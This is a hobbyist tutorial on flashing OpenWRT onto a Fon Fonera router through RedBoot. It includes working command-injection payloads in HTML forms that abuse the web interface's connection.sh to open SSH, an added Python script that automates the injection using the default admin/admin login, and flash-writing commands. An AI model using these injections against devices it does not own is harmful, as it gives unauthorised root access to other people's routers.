OpenWRT on the Fon Fonera

I want to thank McGrew Security http://www.mcgrewsecurity.com/ for doing most of the legwork here.
(notes by Brett Hoff) Dmnhunter in #pauldotcom bhoff—at--open-sourceenterprises.com
(additional notes by Russell Butturini) tcstool in #pauldotcom rbutturini--at--yahoo.com
After countless hours, though, I still had issues, and I hope this helps out a little more.
We have had a few emails in the last few days, so I thought I would add some additional notes in here on the flashing procedure. It will look like it is dying after the telnet and during the init part. See below.
Big warning: Don’t connect the Fon up to the Internet at all until you finish getting a fresh install of OpenWRT on it. It will probably update itself with new firmware from Fon and lock you out of having any fun at all with it.
Through this, the following sites were very helpful. A lot of the steps are pinched and adapted from them:
* Hacking the La Fonera Part II
* OpenWRT’s Wiki page on the Fonera (Doesn’t display right sometimes. Pull it up in Google’s cache if it gives you problems).
The first order of business is to figure out what version of the firmware I have. The default firmware’s status page shows the version; the steps below assume 0.7.1-r1.
We don’t want to turn it into a useless brick in the process of flashing it, and we’re in luck, because the device uses an implementation of RedBoot. To make things easy, we want to enable RedBoot’s ability to listen on the wired Ethernet side for a telnet session on boot. That way, if we screw up, we can always go back into RedBoot and fix it. We’ll also flash it in RedBoot.
To enable RedBoot, we need to get a shell on the default firmware. There’s not an SSH server listening by default, but we’re going to turn one on through a command injection exploit on the web interface. It’s pretty trivial, and it works well on the 0.7.1-r1 version. If you have a newer version, you’ll want to check around to see how to revert it (it might be as simple as holding down the reset button to reset it back to 0.7.1-r1), or if there are new exploits.
(The latest word I've read is that the new units being shipped are coming with a later version of the firmware on them by default; however, there are exploits for the newest firmware too. A quick search of YouTube will yield plenty of how-to videos on using the newer exploits; if all else fails, the unit's firmware can be loaded with the JTAG method.)
You’ll create two HTML files that submit the right input to the web interface: connection.sh hands the username field to a shell, so a $(...) inside it is executed as a command on the Fon. Go ahead and connect to the Fon’s private network SSID “MyPlace”. First, we want to set up iptables to allow traffic on the SSH port (just save this HTML to your hard drive in a .html file called iptables.html, view it in your web browser, and click Submit):
(My Notes: When I did this, I was prompted for a login to the device. If you're lazy like me and didn't read the Fon manual, or got your unit second hand and perhaps don't have the manual, the username is admin and the password is admin....secure!!!)
iptables.html
<html>
<head>
</head>
<body>
<center>
<!-- The username field is the injection vector: connection.sh expands the $(...) in a shell on the Fon. -->
<form method="post" action="http://192.168.10.1/cgi-bin/webif/connection.sh" enctype="multipart/form-data">
<input name="username" value="$(/usr/sbin/iptables -I INPUT 1 -p tcp --dport 22 -j ACCEPT)" size="68" >
<input type="submit" name="submit" value="Submit" />
</form>
</center>
</body>
</html>
Now we want to actually start the dropbear SSH server. Do the same thing again, saving this file as ssh.html:
ssh.html
<html>
<head>
</head>
<body>
<center>
<!-- Same injection, this time starting dropbear so we can log in over SSH. -->
<form method="post" action="http://192.168.10.1/cgi-bin/webif/connection.sh" enctype="multipart/form-data">
<input name="username" value="$(/etc/init.d/dropbear)" size="68" >
<input type="submit" name="submit" value="Submit" />
</form>
</center>
</body>
</html>
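The same two injections can be sent from a script instead of the two HTML files. This is an added example, not code from the original page or from Fon: the URL, the username field and the two commands are the page's; the multipart encoding, the Basic-auth header guessed for the admin/admin login prompt, and the helper names are this example's assumptions.

```python
"""Added example (not from the original page): drive the Fonera 0.7.1-r1
connection.sh command injection from a script instead of two HTML forms.

From the page: the target URL, the 'username' field, and the two injected
commands. Assumptions of this example: the multipart boundary, the helper
names, and HTTP Basic auth for the admin/admin prompt the page mentions."""
import base64
import urllib.request

FON_URL = "http://192.168.10.1/cgi-bin/webif/connection.sh"  # from the page
BOUNDARY = "----fonera-injection-boundary"  # arbitrary, assumed

# The two commands the page injects, in the order it injects them.
STEPS = [
    "/usr/sbin/iptables -I INPUT 1 -p tcp --dport 22 -j ACCEPT",
    "/etc/init.d/dropbear",
]


def injection_value(cmd):
    """The field value the HTML forms carry: a $(...) substitution.
    connection.sh expands 'username' in a shell, so the command runs there."""
    return "$(" + cmd + ")"


def multipart_body(fields, boundary=BOUNDARY):
    """Encode (name, value) pairs as multipart/form-data, the enctype the
    page's forms use, so the CGI parses the request the same way."""
    parts = []
    for name, value in fields:
        parts.append("--" + boundary)
        parts.append('Content-Disposition: form-data; name="%s"' % name)
        parts.append("")
        parts.append(value)
    parts.append("--" + boundary + "--")
    parts.append("")
    return "\r\n".join(parts).encode("utf-8")


def build_request(cmd, url=FON_URL, user="admin", password="admin"):
    """A urllib Request equivalent to submitting one of the page's forms.
    Basic auth for the admin/admin login prompt is an assumption here."""
    body = multipart_body([("username", injection_value(cmd)), ("submit", "Submit")])
    req = urllib.request.Request(url, data=body, method="POST")
    req.add_header("Content-Type", "multipart/form-data; boundary=" + BOUNDARY)
    token = base64.b64encode(("%s:%s" % (user, password)).encode()).decode()
    req.add_header("Authorization", "Basic " + token)
    return req


def run_steps(steps=STEPS, timeout=10):
    """Send each injection in order; the response body is irrelevant,
    what matters is that the Fon accepted the POST."""
    for cmd in steps:
        with urllib.request.urlopen(build_request(cmd), timeout=timeout) as resp:
            print(cmd, "->", resp.status)


if __name__ == "__main__":
    run_steps()
```

Run it while associated to the “MyPlace” SSID; afterwards `ssh root@192.168.10.1` should answer just as the page describes.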
You should be able to SSH into your Fon on port 22 of its IP address (192.168.10.1). You’ll want to set up dropbear to run whenever you reboot the Fon, too:
Note: I was using a Windows laptop to do the flashing.
Make sure the Fon is plugged into the wall before starting.
Also, I used a free TFTP server for Windows, and used PuTTY as my client both to telnet in and, later, to SSH in. Both can be found using Google.
(Another note for lazy people: the root password here is admin.)
weasel@hacktop:~$ ssh root@192.168.10.1
The authenticity of host '192.168.10.1 (192.168.10.1)' can't be established.
RSA key fingerprint is 69:52:42:17:fd:b0:97:1a:5f:33:8d:5a:f0:5b:8a:dc.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.10.1' (RSA) to the list of known hosts.
root@192.168.10.1's password:
BusyBox v1.1.3 (2006.11.21-19:49+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.
_______ _______ _______
| ____|| || _ |
| ____|| - || | | |
| | |_______||__| |__|
|___|
Fonera Firmware (Version 0.7.1 rev 1) -------------
*
* Based on OpenWrt - http://openwrt.org
* Powered by FON - http://www.fon.com
---------------------------------------------------
root@OpenWrt:~# mv /etc/init.d/dropbear /etc/init.d/S50dropbear
Also, use vi to uncomment the two lines in /etc/firewall.user that allow connections on port 22.
(See notes below in the RedBoot Section. This might be a good place to insert information on installing thttpd as it will work for this part of the process as well as the download of the image files.)
To enable RedBoot over Ethernet, you’ll need a modified kernel and a new RedBoot config. For convenience, I set up a web server on the computer I configured my Fon from, downloaded those files, and placed them in the server’s document root. From here on out, I’ll assume you’ve done the same, know what IP address it’s listening on, and will substitute it in as needed.
Next, get the modified kernel and RedBoot config onto your Fon and apply them:
root@OpenWrt:~# wget http://192.168.10.183/out.hex
Connecting to 192.168.10.183[192.168.10.183]:80
out.hex 100% |*******************************************************| 4096 00:00 ETA
root@OpenWrt:~# wget http://192.168.10.183/openwrt-ar531x-2.4-vmlinux-CAMICIA.lzma
Connecting to 192.168.10.183[192.168.10.183]:80
openwrt-ar531x-2.4-v 100% |*******************************************************| 512 KB 00:00 ETA
Note: the l7 in vmlinux.bin.l7 is a lowercase L followed by the digit 7.
This caused me a lot of grief.
root@OpenWrt:~# mtd -e vmlinux.bin.l7 write openwrt-ar531x-2.4-vmlinux-CAMICIA.lzma vmlinux.bin.l7
Unlocking vmlinux.bin.l7 ...
Erasing vmlinux.bin.l7 ...
Writing from openwrt-ar531x-2.4-vmlinux-CAMICIA.lzma to vmlinux.bin.l7 ... [w]
root@OpenWrt:~# reboot
After it finishes rebooting, SSH in and continue…
root@OpenWrt:~# mtd -e "RedBoot config" write out.hex "RedBoot config"
Unlocking RedBoot config ...
Erasing RedBoot config ...
Writing from out.hex to RedBoot config ... [w]
Once that finishes, your Fon probably won’t reboot correctly. No big deal: we’ll be going into RedBoot to flash the new OpenWRT. RedBoot listens on port 9000 of 192.168.1.254 for about ten seconds after boot before it moves on to its boot script. In that window you can send Ctrl-C on this port to stop it and interact with RedBoot. It’s easiest to just use the redboot.pl script to connect to RedBoot (fping must be installed on the system before running it): leave it running on the computer you’re configuring from, plug in the router, and it will connect for you and leave you at a RedBoot prompt.
Note: you have to send the Ctrl-C to the router to stop the boot process so you can interact with it.
Also, you must have the needed files downloaded and placed in the root path of whichever server you are going with; I went with a TFTP server on Windows, tcstool went with an HTTP server on Linux. So the choice is yours...
weasel@hacktop:~$ ./redboot.pl 192.168.1.254
Snipped out a bunch of “unreachable” messages
192.168.1.254 is unreachable
192.168.1.254 is alive
-> == Executing boot script in 7.080 seconds - enter ^C to abort
<- ^C
Trying 192.168.1.254...
Connected to 192.168.1.254.
Escape character is '^]'.
RedBoot>
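A Python stand-in for redboot.pl, added here as an example; it is not the page's script and needs no fping. It assumes only what the transcript shows: RedBoot on 192.168.1.254 port 9000 prints the “enter ^C to abort” banner, and a 0x03 byte sent in that window yields the RedBoot> prompt. The polling loop, the banner parsing and the interactive relay are this example's own design.

```python
"""Added example (not the page's redboot.pl): catch RedBoot on the Fonera's
Ethernet side from Python.

From the page: RedBoot answers on 192.168.1.254:9000 for a few seconds after
power-on, prints '... enter ^C to abort', and a Ctrl-C (0x03) sent in that
window leaves you at 'RedBoot>'. The polling loop, the banner parsing and
the stdin/stdout relay below are this example's own design (assumptions)."""
import re
import select
import socket
import sys
import time

REDBOOT_IP = "192.168.1.254"   # from the page
REDBOOT_PORT = 9000            # from the page
ABORT_RE = re.compile(rb"Executing boot script in ([0-9.]+) seconds - enter \^C to abort")


def countdown_seconds(data):
    """Seconds left before RedBoot runs its boot script, or None if the
    abort banner has not appeared in the bytes seen so far."""
    m = ABORT_RE.search(data)
    return float(m.group(1)) if m else None


def catch_prompt(recv, send, deadline=10.0, clock=time.monotonic):
    """Read with recv() until the abort banner shows, send Ctrl-C, then keep
    reading until 'RedBoot>' appears. recv() returns b'' on EOF and must not
    block forever (use a socket timeout). Returns everything seen on success,
    None if the window closed first."""
    seen = b""
    aborted = False
    end = clock() + deadline
    while clock() < end:
        try:
            chunk = recv(256)
        except socket.timeout:
            continue
        if not chunk:
            return None
        seen += chunk
        if not aborted and countdown_seconds(seen) is not None:
            send(b"\x03")          # the ^C the page tells you to send
            aborted = True
        if aborted and b"RedBoot>" in seen:
            return seen
    return None


def connect_when_alive(host, port, poll=0.2, wait=120.0):
    """Poll until the bootloader accepts a TCP connection (it only listens
    for a moment after power-on), the job redboot.pl's ping loop does."""
    end = time.monotonic() + wait
    while time.monotonic() < end:
        try:
            s = socket.create_connection((host, port), timeout=1.0)
            s.settimeout(0.5)
            return s
        except OSError:
            time.sleep(poll)
    raise TimeoutError("no RedBoot on %s:%d within %.0fs" % (host, port, wait))


def relay(sock):
    """Minimal interactive loop (POSIX only): stdin to RedBoot, RedBoot to stdout."""
    sock.settimeout(None)
    while True:
        ready, _, _ = select.select([sock, sys.stdin], [], [])
        if sock in ready:
            data = sock.recv(4096)
            if not data:
                return
            sys.stdout.write(data.decode("latin-1"))
            sys.stdout.flush()
        if sys.stdin in ready:
            line = sys.stdin.readline()
            if not line:
                return
            sock.sendall(line.encode("latin-1"))


if __name__ == "__main__":
    host = sys.argv[1] if len(sys.argv) > 1 else REDBOOT_IP
    print("plug in the Fon; waiting for RedBoot on %s:%d" % (host, REDBOOT_PORT))
    s = connect_when_alive(host, REDBOOT_PORT)
    banner = catch_prompt(s.recv, s.sendall)
    if banner is None:
        sys.exit("missed the abort window; power-cycle the Fon and retry")
    sys.stdout.write(banner.decode("latin-1"))
    relay(s)
```

Start it before plugging the Fon in, exactly as with redboot.pl; if it reports a missed window, power-cycle and let it try again.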
Once we have RedBoot working, we can flash the Fon with the latest OpenWRT. Go to the OpenWRT download site, download “openwrt-atheros-2.6-vmlinux.lzma” and “openwrt-atheros-2.6-root.jffs2-64k”, and then place them in the root directory of the web server you’re running.
Connect up to RedBoot again, and use the following commands to initialize the flash image system on the Fon, configure the network settings (with your own computer/web server’s address instead of 192.168.1.5), and write OpenWRT to the Fon. Note that these commands take some time, especially writing the root filesystem. Play some Sudoku or something.
Note: you may not see any feedback during this step, and it may even look like your connection is dead, but just leave it and it will come back.
The thing I learned in this part of the process is that RedBoot is EXTREMELY picky about the HTTP responses it gets back. I was doing this with a laptop that didn't have a dedicated HTTP server, and I really didn't want to install something that would leave a large footprint on the system, so I decided to install a lightweight HTTP server. I tried a couple of different lightweight web server packages, which yielded "Unrecognized HTTP response" errors inside of RedBoot. I even got these errors with an older version of Apache. The method I found best was to install thttpd. This was my method using Debian:
apt-get install thttpd
Copy all your downloaded OpenWRT files to /tmp (or any other directory of your liking)
thttpd -d /tmp
Browse to http://127.0.0.1 to verify that you see a directory listing of the files inside /tmp
RedBoot> ip_address -l 192.168.1.254/24 -h 192.168.1.5
IP: 192.168.1.254/255.255.255.0, Gateway: 0.0.0.0
Default server: 192.168.1.5
RedBoot> fis init
About to initialize [format] FLASH image system - continue (y/n)? y
*** Initialize FLASH Image System
... Erase from 0xa87e0000-0xa87f0000: .
... Program from 0x80ff0000-0x81000000 at 0xa87e0000: .
RedBoot> load -r -v -b 0x80040450 /openwrt-atheros-2.6-root.jffs2-64k -m HTTP
-
Raw file loaded 0x80040450-0x801e044f, assumed entry at 0x80040450
RedBoot> fis create -b 0x80040450 -f 0xA8030000 -l 0x00700000 -e 0x00000000 rootfs
... Erase from 0xa8030000-0xa8730000: ................................................................................................................
... Program from 0x80040450-0x80740450 at 0xa8030000: ................................................................................................................
... Erase from 0xa87e0000-0xa87f0000: .
... Program from 0x80ff0000-0x81000000 at 0xa87e0000: .
RedBoot> load -r -v -b %{FREEMEMLO} /openwrt-atheros-2.6-vmlinux.lzma -m HTTP
-
Raw file loaded 0x80040800-0x800f07ff, assumed entry at 0x80040800
RedBoot> fis create -r 0x80041000 -e 0x80041000 vmlinux.bin.l7
... Erase from 0xa8730000-0xa87e0000: ...........
... Program from 0x80040800-0x800f0800 at 0xa8730000: ...........
... Erase from 0xa87e0000-0xa87f0000: .
... Program from 0x80ff0000-0x81000000 at 0xa87e0000: .
RedBoot> fis load -l vmlinux.bin.l7
Image loaded from 0x80041000-0x80289086
RedBoot> exec
(Edit: Note that for the line “fis create -b 0x80040450 -f 0xA8030000 -l 0x00700000 -e 0x00000000 rootfs”, you may need to use “-l 0x006F0000” instead of “-l 0x00700000”, since the Kamikaze kernel has apparently grown since I wrote this. Thanks to DmnHunter on #pauldotcom for the tip!)
(Confirmed. You definitely have to do this with the latest build of Kamikaze. No worries if you forget though, it will error out quickly and give you a chance to correct.)
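The -l question can be settled with arithmetic on the numbers already in the transcript. The following is an added example, not code from the page: it takes the addresses and image sizes the RedBoot session printed and computes how much room a given rootfs -l leaves for the kernel that is created right after it, and the largest -l that still fits. Reading 0xA87E0000 (the block every fis command rewrites) as the end of usable flash and 64 KB as the erase block are this example's assumptions.

```python
"""Added example, not code from the original page: sanity-check the Fonera
flash layout implied by the RedBoot transcript before typing 'fis create'.

Numbers taken from the transcript: rootfs is created at 0xA8030000, every
fis command rewrites the 64 KB block at 0xA87E0000 (the FIS directory), and
the two images loaded were 0x1A0000 (rootfs) and 0xB0000 (kernel) bytes.
Treating 0xA87E0000 as the end of usable space and 0x10000 as the erase
block is this example's reading of those numbers (an assumption), not
something the page states outright."""

BLOCK = 0x10000                  # 64 KB erase block: jffs2-64k image, one dot per block
ROOTFS_START = 0xA8030000        # -f on the page's 'fis create ... rootfs' line
FIS_DIR = 0xA87E0000             # first block that images must not reach
ROOTFS_IMAGE = 0x801E044F - 0x80040450 + 1   # 0x1A0000, from 'Raw file loaded'
KERNEL_IMAGE = 0x800F07FF - 0x80040800 + 1   # 0x0B0000, from 'Raw file loaded'


def round_up(n, block=BLOCK):
    """fis create reserves whole erase blocks for an image."""
    return (n + block - 1) // block * block


def plan(rootfs_len, kernel_image=KERNEL_IMAGE, rootfs_image=ROOTFS_IMAGE):
    """Lay out rootfs (fixed -l length) and the kernel RedBoot places right
    after it (the page's second fis create gives no -f, so it lands in the
    next free flash). Returns both regions and whether each image fits."""
    rootfs_end = ROOTFS_START + rootfs_len
    kernel_end = rootfs_end + round_up(kernel_image)
    return {
        "rootfs": (ROOTFS_START, rootfs_end),
        "kernel": (rootfs_end, kernel_end),
        "rootfs_fits": rootfs_len % BLOCK == 0 and rootfs_image <= rootfs_len,
        "kernel_fits": kernel_end <= FIS_DIR,
        "kernel_room": FIS_DIR - rootfs_end,     # bytes left for the kernel
    }


def max_rootfs_len(kernel_image=KERNEL_IMAGE):
    """Largest -l for rootfs that still leaves room for a kernel of this size."""
    return FIS_DIR - round_up(kernel_image) - ROOTFS_START


def fis_create_rootfs(rootfs_len, load_addr=0x80040450):
    """The rootfs 'fis create' line in the form the page types it."""
    return "fis create -b 0x%08X -f 0x%08X -l 0x%08X -e 0x00000000 rootfs" % (
        load_addr, ROOTFS_START, rootfs_len)


def report(rootfs_len, kernel_image=KERNEL_IMAGE):
    """Print the layout for one -l choice; returns True if everything fits."""
    p = plan(rootfs_len, kernel_image)
    print(fis_create_rootfs(rootfs_len))
    print("  rootfs 0x%08X-0x%08X  image 0x%06X  fits: %s"
          % (p["rootfs"][0], p["rootfs"][1], ROOTFS_IMAGE, p["rootfs_fits"]))
    print("  kernel 0x%08X-0x%08X  image 0x%06X  room 0x%06X  fits: %s"
          % (p["kernel"][0], p["kernel"][1], kernel_image, p["kernel_room"], p["kernel_fits"]))
    return p["rootfs_fits"] and p["kernel_fits"]


if __name__ == "__main__":
    # The page's original -l with the kernel size from its transcript: it exactly fills the space.
    report(0x00700000)
    # A kernel even one byte larger (a grown Kamikaze build; constructed value) spills into the FIS block...
    report(0x00700000, kernel_image=KERNEL_IMAGE + 1)
    # ...which is why the edit note recommends 0x006F0000.
    print("largest -l for that kernel: 0x%08X" % max_rootfs_len(KERNEL_IMAGE + 1))
    report(0x006F0000, kernel_image=KERNEL_IMAGE + 1)
```

The rootfs -l is a partition length, not the image length (the jffs2 image grows into whatever it is given), so the only thing -l really trades off is how much flash is left for the kernel that follows it. Plug in the “Raw file loaded” range your own RedBoot prints for the kernel to see whether 0x00700000 still works for your build.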
The last command starts up the new system. Give it some time to boot, and it should show up on 192.168.1.1. Now you can telnet in and set a password if you like (which automatically sets up an SSH server for you).
Congratulations! If it worked as well for you as it did for me, you’re running a fresh install of OpenWRT on your Fon. You might want to start reading up on the OpenWRT Wiki about how to configure the Kamikaze version of OpenWRT. I’ll also post some scripts, hints, and tricks to this blog as I come up with them (especially when it’s of interest to the security community).
If you are still having problems, you can find me (Dmnhunter), tcstool or cs_weasel in the IRC room #pauldotcom.